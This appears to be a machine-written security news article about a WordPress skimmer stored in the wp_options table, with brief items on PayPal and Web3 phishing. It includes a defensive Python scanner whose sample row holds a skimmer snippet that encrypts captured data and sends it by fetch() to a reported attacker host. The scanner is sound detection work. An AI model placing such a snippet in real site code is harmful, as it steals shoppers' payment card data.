Ethical Hacking News
Cybersecurity researchers have identified a new campaign of credit card skimmers that use stealthy tactics to evade detection. The malware stores malicious JavaScript in WordPress database tables rather than in files and uses it to steal sensitive payment details. The script activates only on checkout pages, where it either hijacks the existing payment fields or injects a fake credit card form. Sucuri found the code stored in the WordPress wp_options table under the "widget_block" option, a location that file-based scanners do not inspect. The code is planted through the WordPress admin panel and captures the visitor's card number, expiration date, CVV and billing details. The stolen data is encrypted with AES-CBC and Base64-encoded before being transmitted to an attacker-controlled server.
Cybersecurity researchers have identified a new campaign of credit card skimmers that employ stealthy tactics to evade detection by security tools. The malicious actors have been observed injecting malicious JavaScript code into the database tables associated with popular Content Management Systems (CMS) such as WordPress.
According to Sucuri researcher Puja Srivastava, this particular type of credit card skimmer malware is designed to silently inject malicious JavaScript into database entries in order to steal sensitive payment details. The malware is programmed to activate specifically on checkout pages, either by hijacking existing payment fields or injecting a fake credit card form.
"This credit card skimmer malware targeting WordPress websites silently injects malicious JavaScript into database entries to steal sensitive payment details," Srivastava explained in her recent analysis. "The malware activates specifically on checkout pages, either by hijacking existing payment fields or injecting a fake credit card form."
The GoDaddy-owned security company Sucuri discovered the malware embedded into the WordPress wp_options table with the option "widget_block." This allowed it to avoid detection by scanning tools and persist on compromised sites without attracting attention.
The malicious code was injected through the WordPress admin panel, specifically within an HTML block widget. The JavaScript first checks whether the current page is a checkout page and only then takes action, at the moment the site visitor is about to enter their payment details.
At this point, the rogue script dynamically creates a bogus payment screen that mimics legitimate payment processors like Stripe. The form is designed to capture users' credit card numbers, expiration dates, CVV numbers, and billing information.
Alternatively, the malware can capture data entered on legitimate payment screens in real time, which maximizes compatibility with whatever checkout the site already uses. The stolen data is then encrypted with AES-CBC and Base64-encoded so that the exfiltrated payload looks innocuous and resists casual analysis.
In the final stage, the data is transmitted to an attacker-controlled server ("valhafather[.]xyz" or "fqbe23[.]xyz"). This campaign marks a significant escalation in the stealthy tactics employed by credit card skimmers.
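Because the skimmer lives in the database rather than in theme or plugin files, a file-integrity scan will not find it; the check a practitioner wants is a scan of wp_options itself. The following detector is an added example written for this page, not code from Sucuri or the original article. It assumes the rows have already been exported, for instance with WP-CLI (`wp db query "SELECT option_id, option_name, option_value FROM wp_options"`), and the sample rows below are constructed for the demonstration (real widget_block values are PHP-serialized arrays; the scan works on the raw string either way). The two exfiltration hosts are the ones named above; every other hostname is a placeholder.

```python
"""Scan exported wp_options rows for inline JavaScript with skimmer traits."""
import re
from typing import Dict, List, Tuple

# Exfiltration hosts reported for this campaign, kept defanged as on the page
# and refanged only for comparison.
KNOWN_C2_DEFANGED = ("valhafather[.]xyz", "fqbe23[.]xyz")
KNOWN_C2 = tuple(d.replace("[.]", ".") for d in KNOWN_C2_DEFANGED)

SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)
# The skimmer gates on checkout pages before doing anything.
CHECKOUT_GATE = re.compile(r"checkout", re.IGNORECASE)
# Helpers typical of payloads that AES-encrypt and then Base64 their output.
OBFUSCATION = re.compile(r"\b(CryptoJS|AES|atob|btoa|fromCharCode)\b")
HOSTNAME = re.compile(r"https?://([A-Za-z0-9.-]+\.[A-Za-z]{2,})")


def score_widget(option_value: str) -> Dict[str, object]:
    """Return indicator hits, referenced hosts and a severity for one option value."""
    hosts = sorted(set(HOSTNAME.findall(option_value)))
    hits = {
        "inline_script": bool(SCRIPT_TAG.search(option_value)),
        "checkout_gating": bool(CHECKOUT_GATE.search(option_value)),
        "obfuscation": bool(OBFUSCATION.search(option_value)),
        "known_c2": any(h in KNOWN_C2 for h in hosts),
    }
    if not hits["inline_script"]:
        severity = "clean"  # no script tag: mentioning "checkout" alone is fine
    elif hits["known_c2"] or (hits["checkout_gating"] and hits["obfuscation"]):
        severity = "high"
    elif hits["checkout_gating"] or hits["obfuscation"]:
        severity = "medium"
    else:
        severity = "review"  # any script stored in the database deserves a look
    return {"severity": severity, "hits": hits, "hosts": hosts}


def scan_options(rows: List[Tuple[int, str, str]]) -> List[Dict[str, object]]:
    """Scan (option_id, option_name, option_value) rows; return the non-clean ones."""
    findings = []
    for option_id, option_name, option_value in rows:
        result = score_widget(option_value)
        if result["severity"] != "clean":
            findings.append({"option_id": option_id, "option_name": option_name, **result})
    return findings


# Constructed sample rows (hostnames other than the two reported C2 domains are placeholders).
SKIMMER_SNIPPET = (
    '<!-- wp:html --><script>if(location.href.indexOf("checkout")!==-1){'
    'var p=CryptoJS.AES.encrypt(JSON.stringify(d),k);'
    'fetch("https://valhafather.xyz/api/collect",{method:"POST",body:btoa(p)})}'
    "</script><!-- /wp:html -->"
)
SAMPLE_ROWS = [
    (1, "siteurl", "https://shop.example"),
    (2, "widget_block", "<!-- wp:paragraph --><p>Free shipping over $50. Proceed to checkout!</p><!-- /wp:paragraph -->"),
    (3, "widget_custom_html", '<!-- wp:html --><script src="https://cdn.example-chat.com/widget.js"></script><!-- /wp:html -->'),
    (4, "widget_block", SKIMMER_SNIPPET),
]

if __name__ == "__main__":
    for f in scan_options(SAMPLE_ROWS):
        print(f"option_id={f['option_id']} {f['option_name']}: {f['severity']} hosts={f['hosts']}")
```

The severity ladder is deliberately conservative: any `<script>` stored in an option is reported so that a benign third-party widget is reviewed rather than ignored, while the combination of checkout gating and crypto helpers, or a known exfiltration host, is raised to high. Run the same scan over wp_posts and wp_postmeta as well, since the same trick works on any table whose content WordPress renders.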
The development comes more than a month after Sucuri highlighted a similar campaign that leveraged JavaScript malware to dynamically create fake credit card forms or extract data entered in payment fields on checkout pages. What sets the new variant apart is where it hides: in a database option rather than in theme or plugin files, which is what lets it slip past file-based scanners.
In related news, cybersecurity researchers have also identified a phishing email campaign that tricks recipients into clicking through to PayPal login pages under the guise of an outstanding payment request. The scammer appears to have simply registered a Microsoft 365 test domain and created a distribution list containing victim emails.
On the PayPal web portal, they simply request the money and add the distribution list as the recipient address. What makes this campaign sneaky is that the messages originate from a legitimate PayPal address (service@paypal.com) and contain a genuine sign-in URL, which allows the emails to slip past security tools.
As soon as the victim logs in to their PayPal account to deal with the payment request, their account is automatically linked to the email address of the distribution list, permitting the threat actor to hijack control of the account.
Furthermore, malicious actors have also been observed leveraging a novel technique called transaction simulation spoofing to steal cryptocurrency from victim wallets. Modern Web3 wallets incorporate transaction simulation as a user-friendly feature that allows users to preview the expected outcome of their transactions before signing them.
However, attackers have found ways to exploit this mechanism, taking advantage of the time gap between transaction simulation and execution to set up fake sites mimicking decentralized apps (DApps) in order to carry out fraudulent wallet draining attacks. This new attack vector represents a significant evolution in phishing techniques and makes detection particularly challenging.
Related Information:
https://thehackernews.com/2025/01/wordpress-skimmers-evade-detection-by.html
Published: Mon Jan 13 01:24:08 2025 by llama3.2 3B Q4_K_M